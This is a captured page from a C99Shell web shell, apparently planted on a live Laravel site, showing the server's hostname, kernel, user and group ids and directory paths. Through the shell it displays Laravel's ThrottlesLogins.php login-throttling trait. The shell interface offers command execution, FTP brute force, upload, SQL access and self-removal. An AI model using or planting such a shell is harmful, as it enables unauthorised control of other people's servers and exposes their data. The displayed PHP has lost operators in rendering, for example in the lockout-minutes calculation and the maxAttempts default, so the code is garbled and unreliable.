!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/vendor/laravel/ui/auth-backend/   drwxr-xr-x
Free 25.4 GB of 117.98 GB (21.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ThrottlesLogins.php (3.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Foundation\Auth;

use 
Illuminate\Auth\Events\Lockout;
use 
Illuminate\Cache\RateLimiter;
use 
Illuminate\Http\Request;
use 
Illuminate\Http\Response;
use 
Illuminate\Support\Str;
use 
Illuminate\Validation\ValidationException;

trait 
ThrottlesLogins
{
    
/**
     * Determine if the user has too many failed login attempts.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return bool
     */
    
protected function hasTooManyLoginAttempts(Request $request)
    {
        return 
$this->limiter()->tooManyAttempts(
            
$this->throttleKey($request), $this->maxAttempts()
        );
    }

    
/**
     * Increment the login attempts for the user.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return void
     */
    
protected function incrementLoginAttempts(Request $request)
    {
        
$this->limiter()->hit(
            
$this->throttleKey($request), $this->decayMinutes() * 60
        
);
    }

    
/**
     * Redirect the user after determining they are locked out.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Symfony\Component\HttpFoundation\Response
     *
     * @throws \Illuminate\Validation\ValidationException
     */
    
protected function sendLockoutResponse(Request $request)
    {
        
$seconds $this->limiter()->availableIn(
            
$this->throttleKey($request)
        );

        throw 
ValidationException::withMessages([
            
$this->username() => [trans('auth.throttle', [
                
'seconds' => $seconds,
                
'minutes' => ceil($seconds 60),
            ])],
        ])->
status(Response::HTTP_TOO_MANY_REQUESTS);
    }

    
/**
     * Clear the login locks for the given user credentials.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return void
     */
    
protected function clearLoginAttempts(Request $request)
    {
        
$this->limiter()->clear($this->throttleKey($request));
    }

    
/**
     * Fire an event when a lockout occurs.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return void
     */
    
protected function fireLockoutEvent(Request $request)
    {
        
event(new Lockout($request));
    }

    
/**
     * Get the throttle key for the given request.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return string
     */
    
protected function throttleKey(Request $request)
    {
        return 
Str::transliterate(Str::lower($request->input($this->username())).'|'.$request->ip());
    }

    
/**
     * Get the rate limiter instance.
     *
     * @return \Illuminate\Cache\RateLimiter
     */
    
protected function limiter()
    {
        return 
app(RateLimiter::class);
    }

    
/**
     * Get the maximum number of attempts to allow.
     *
     * @return int
     */
    
public function maxAttempts()
    {
        return 
property_exists($this'maxAttempts') ? $this->maxAttempts 5;
    }

    
/**
     * Get the number of minutes to throttle for.
     *
     * @return int
     */
    
public function decayMinutes()
    {
        return 
property_exists($this'decayMinutes') ? $this->decayMinutes 1;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--